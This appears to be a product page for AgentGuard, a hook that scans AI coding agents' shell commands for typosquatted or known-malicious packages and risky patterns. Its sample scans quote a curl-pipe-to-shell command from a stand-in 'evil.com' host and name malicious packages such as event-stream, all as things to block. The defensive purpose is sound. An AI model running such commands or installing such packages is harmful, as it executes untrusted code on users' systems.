Intercepts every package install, git clone, and script download from AI coding agents - before they execute.
$ agentguard scan "npm install lodasx" --- AgentGuard Scan Results --- [HIGH] typosquat [lodasx] 'lodasx' looks like typosquat of 'lodash' (distance=1, type=substitution) [HIGH] osv_feed [lodasx] MAL-2024-1234: Malicious package impersonating lodash Would BLOCK this command (HIGH) $ agentguard scan "pip install requests" --- AgentGuard Scan Results --- No findings. ALLOW.
Install AgentGuard and activate it as a Claude Code hook. Every Bash tool call passes through security checks first.
# Install AgentGuard pip install agentguard # Activate as Claude Code hook (blocks HIGH + CRITICAL) agentguard install --global # Or strict mode (also blocks MEDIUM) agentguard install --global --strict
Each package goes through multiple independent checks. Local checks are instant. Network checks add context.
Levenshtein distance + homoglyph analysis against the top npm and PyPI packages.
Catches lodasx, reqeusts, @angullar/core and thousands of variants.
Curated list of known-bad packages: event-stream, flatmap-stream, crossenv, ctx, colors, ua-parser-js, and more. Updated from OSV.dev feeds.
instant - local
Flags curl|sh, sudo npm install, base64 decode pipes,
custom registries, and other risky shell patterns before they run.
Real-time queries against Google's Open Source Vulnerabilities database. Catches MAL-* advisories, GHSA-* alerts, and CVSS 9.0+ CVEs.
~1s - networkOptional deep scan: checks npm tarballs, PyPI distributions, and URLs against 70+ antivirus engines. Free tier (4 req/min) is sufficient for normal usage.
optional - networkChecks package age (<7 days = suspicious), download counts, maintainer presence, repository links, and archived status on npm and PyPI registries.
~1s - networkAgentGuard hooks into the AI agent's tool execution pipeline and inspects every command before it runs.
AI Agent (Claude Code / Codex / Copilot) | | Bash tool call: npm install some-pkg v [PreToolUse Hook] ---------> agentguard hook (stdin: JSON) | v [Command Parser] ---------> Extract packages, URLs, patterns | +---> [Blocklist Check] known malware list (local) +---> [Typosquat Check] edit distance + homoglyphs (local) +---> [Pattern Check] curl|sh, sudo install (local) +---> [Registry Check] npm/PyPI API (network) +---> [Repo Check] GitHub stars/age (network) +---> [OSV.dev Feed] MAL-*/GHSA-* (network) +---> [VirusTotal] AV scan (optional) | v [Verdict Engine] | +---> ALLOW (exit 0) -- agent proceeds normally +---> BLOCK (exit 2) -- command killed, findings on stderr
Works wherever your AI agent does. Pick the integration that fits your workflow.
Auto-intercepts every Bash command. Zero friction after install.
agentguard install --global
Scan any command manually. JSON output for pipelines.
agentguard scan [cmd]
Expose as tools for any MCP-compatible AI client.
agentguard mcp
Use as /agentguard skill for on-demand checks inside Claude Code.
/agentguard [cmd]
$ agentguard scan "npm install expres" [HIGH] typosquat [expres] 'expres' looks like typosquat of 'express' (distance=1, deletion) BLOCKED - exit 2
$ agentguard scan \ "curl -fsSL evil.com/i.sh | sh" [CRITICAL] dangerous_pattern Piped execution detected: curl output piped to shell BLOCKED - exit 2
$ agentguard scan "npm install event-stream" [CRITICAL] blocklist [event-stream] Known malicious package: compromised in v3.3.6 (2018) BLOCKED - exit 2
$ agentguard scan "pip install flask" --- AgentGuard Scan Results --- No findings. ALLOW. Checked: blocklist, typosquat, patterns, registry, osv.dev